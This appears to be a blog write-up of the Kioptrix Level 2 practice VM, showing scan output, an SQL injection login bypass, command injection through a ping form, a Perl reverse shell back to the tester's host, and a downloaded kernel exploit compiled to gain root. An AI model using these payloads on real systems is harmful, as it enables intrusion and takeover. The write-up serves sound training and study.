+ http://192.168.180.138/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/ja/howto/ ----

+ http://192.168.180.138/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.180.138/manual/ja/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ja/misc/ ----

+ http://192.168.180.138/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/ja/mod/ ----

+ http://192.168.180.138/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.180.138/manual/ja/programs/ ----

+ http://192.168.180.138/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.180.138/manual/ja/ssl/ ----

+ http://192.168.180.138/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.180.138/manual/ja/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ko/developer/ ----

+ http://192.168.180.138/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/ko/faq/ ----

+ http://192.168.180.138/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.180.138/manual/ko/howto/ ----

+ http://192.168.180.138/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.180.138/manual/ko/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ko/misc/ ----

+ http://192.168.180.138/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/ko/mod/ ----

+ http://192.168.180.138/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.180.138/manual/ko/programs/ ----

+ http://192.168.180.138/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.180.138/manual/ko/ssl/ ----

+ http://192.168.180.138/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/ko/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ru/developer/ ----

+ http://192.168.180.138/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/ru/faq/ ----

+ http://192.168.180.138/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/ru/howto/ ----

+ http://192.168.180.138/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.180.138/manual/ru/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ru/misc/ ----

+ http://192.168.180.138/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/ru/mod/ ----

+ http://192.168.180.138/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.180.138/manual/ru/programs/ ----

+ http://192.168.180.138/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.180.138/manual/ru/ssl/ ----

+ http://192.168.180.138/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/ru/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

-----------------

END_TIME: Tue Aug 9 02:13:55 2016

DOWNLOADED: 262884 - FOUND: 102

nikto -h 192.168.180.138

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 192.168.180.138

+ Target Hostname: 192.168.180.138

+ Target Port: 80

+ Start Time: 2016-08-09 02:15:09 (GMT-4)

---------------------------------------------------------------------------

+ Server: Apache/2.0.52 (CentOS)

+ Retrieved x-powered-by header: PHP/4.3.9

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.

+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x5770d 0x1c42 0xac5f9a00;5770b 0x206 0x84f07cc0

+ Uncommon header 'tcn' found, with contents: choice

+ OSVDB-3092: /manual/: Web server manual found.

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3268: /manual/images/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 8346 requests: 1 error(s) and 17 item(s) reported on remote host

+ End Time: 2016-08-09 02:15:36 (GMT-4) (27 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

In the HTML body we see that the admin user is Administator.

html>

<body>

<tr>

<b>Remote System Administration Login</b>

</td>

</tr>

<tr>

<td width="150">Username</td>

</tr>

<tr>

<td width="150">Password</td>

<td>

</td>

</tr>

<tr>

</td>

</tr>

</table>

</form>

</body>

</html>

Let us inject with the following user and password:

Administrator

' OR '1'='1

We have a pannel that allows us to ping. Let us try this:

ping 127.0.0.1&whoami
Output:
apache

One more test:

ping 127.0.0.1&perl -v

This is perl, v5.8.5 built for i386-linux-thread-multi

Perl may be copied only under the terms of either the Artistic License or the

GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on

this system using `man perl' or `perldoc perl'. If you have access to the

Internet, point your browser at http://www.perl.com/, the Perl Home Page.

Great! Let's get a shell:

ping 127.0.0.1&perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

On our end:

nc -nlvp 443

listening on [any] 443 ...

connect to [192.168.180.132] from (UNKNOWN) [192.168.180.138] 32770

whoami

apache

index.php

pingit.php

uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

<?php

mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());

//print "Connected to MySQL<br />";

mysql_select_db("webapp");

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

squid:x:23:23::/var/spool/squid:/sbin/nologin

webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

john:x:500:500::/home/john:/bin/bash

harold:x:501:501::/home/harold:/bin/bash

ps -aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.4 3588 548 ? S Aug08 0:00 init [3]

root 2 0.0 0.0 0 0 ? SN Aug08 0:00 [ksoftirqd/0]

root 3 0.0 0.0 0 0 ? S< Aug08 0:00 [events/0]

root 4 0.0 0.0 0 0 ? S< Aug08 0:00 [khelper]

root 5 0.0 0.0 0 0 ? S< Aug08 0:00 [kacpid]

root 82 0.0 0.0 0 0 ? S< Aug08 0:00 [kblockd/0]

root 83 0.0 0.0 0 0 ? S Aug08 0:00 [khubd]

root 100 0.0 0.0 0 0 ? S Aug08 0:00 [pdflush]

root 101 0.0 0.0 0 0 ? S Aug08 0:00 [pdflush]

root 102 0.0 0.0 0 0 ? S Aug08 0:00 [kswapd0]

root 103 0.0 0.0 0 0 ? S< Aug08 0:00 [aio/0]

root 249 0.0 0.0 0 0 ? S Aug08 0:00 [kseriod]

root 482 0.0 0.0 0 0 ? S< Aug08 0:00 [ata/0]

root 483 0.0 0.0 0 0 ? S< Aug08 0:00 [ata_aux]

root 498 0.0 0.0 0 0 ? S Aug08 0:00 [kjournald]

root 1745 0.0 0.3 3120 440 ? S<s Aug08 0:00 udevd

root 1785 0.0 0.0 0 0 ? S Aug08 0:00 [shpchpd_event]

root 1862 0.0 0.0 0 0 ? S< Aug08 0:00 [kauditd]

root 1974 0.0 0.0 0 0 ? S Aug08 0:00 [kjournald]

root 2692 0.0 0.5 2432 680 ? Ss Aug08 0:00 /sbin/dhclient -1 -q -lf /var/lib/dhcp/dhclient-eth0.leases -pf /var/run/dhclient-eth0.pid eth0

root 2731 0.0 0.4 2196 540 ? Ss Aug08 0:00 syslogd -m 0

root 2735 0.0 0.3 1536 384 ? Ss Aug08 0:00 klogd -x

rpc 2762 0.0 0.4 2424 600 ? Ss Aug08 0:00 portmap

rpcuser 2781 0.0 0.6 3772 852 ? Ss Aug08 0:00 rpc.statd

root 2807 0.0 0.2 5504 368 ? Ss Aug08 0:00 rpc.idmapd

root 2880 0.0 0.3 3400 444 ? Ss Aug08 0:00 /usr/sbin/acpid

root 2964 0.0 0.9 5432 1140 ? Ss Aug08 0:00 /usr/sbin/sshd

root 2977 0.0 0.6 3352 768 ? Ss Aug08 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid

root 2995 0.0 1.6 8436 2044 ? Ss Aug08 0:00 sendmail: accepting connections

smmsp 3004 0.0 1.2 6932 1632 ? Ss Aug08 0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue

root 3014 0.0 0.2 2936 352 ? Ss Aug08 0:00 gpm -m /dev/input/mice -t imps2

root 3023 0.0 0.7 6184 936 ? Ss Aug08 0:00 crond

xfs 3044 0.0 1.0 3940 1300 ? Ss Aug08 0:00 xfs -droppriv -daemon

root 3061 0.0 0.3 3128 428 ? Ss Aug08 0:00 /usr/sbin/atd

dbus 3070 0.0 0.6 2604 804 ? Ss Aug08 0:00 dbus-daemon-1 --system

root 3079 0.0 4.5 8808 5772 ? Ss Aug08 0:00 hald

root 3399 0.0 0.5 3328 680 ? Ss Aug08 0:00 dhclient

root 3401 0.0 8.1 22088 10272 ? Ss Aug08 0:00 httpd

root 3427 0.0 0.9 4460 1236 ? S Aug08 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid

mysql 3469 0.0 14.8 127236 18736 ? Sl Aug08 0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock

root 3499 0.0 0.3 3124 388 tty1 Ss+ Aug08 0:00 /sbin/mingetty tty1

root 3500 0.0 0.3 3300 384 tty2 Ss+ Aug08 0:00 /sbin/mingetty tty2

root 3501 0.0 0.3 3460 388 tty3 Ss+ Aug08 0:00 /sbin/mingetty tty3

root 3502 0.0 0.3 3444 388 tty4 Ss+ Aug08 0:00 /sbin/mingetty tty4

root 3503 0.0 0.3 2928 384 tty5 Ss+ Aug08 0:00 /sbin/mingetty tty5

root 3504 0.0 0.3 2964 388 tty6 Ss+ Aug08 0:00 /sbin/mingetty tty6

root 4973 0.0 1.7 9564 2256 ? SNs Aug08 0:00 cupsd

apache 5112 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5113 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5114 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5115 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5116 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5117 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5118 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 5119 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd

apache 10408 0.0 2.3 7560 3020 ? S 00:01 0:00 perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

apache 10482 0.0 0.6 3600 796 ? R 00:05 0:00 ps -aux

cat /etc/issue

Welcome to Kioptrix Level 2 Penetration and Assessment Environment

--The object of this game:

|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to

appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability

caused by running, installing or using this VM image.

Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production

environment. Nor should you give this system access to the outside world

(the Internet - or Interwebs..)

Good luck and have fun!

Ok, nice info let's exploit:

https://www.exploit-db.com/exploits/9542/

wget -P /tmp/ http://192.168.180.132/9542.c

gcc /tmp/9542.c -o /tmp/9542

bash -i

exec /tmp/9542

whoami

root

Game over.

Best Regards,
Yuriy Stacnhev/URIX

Pages

Tuesday, 16 August 2016

Kioptrix Level 2

About Me

Total Pageviews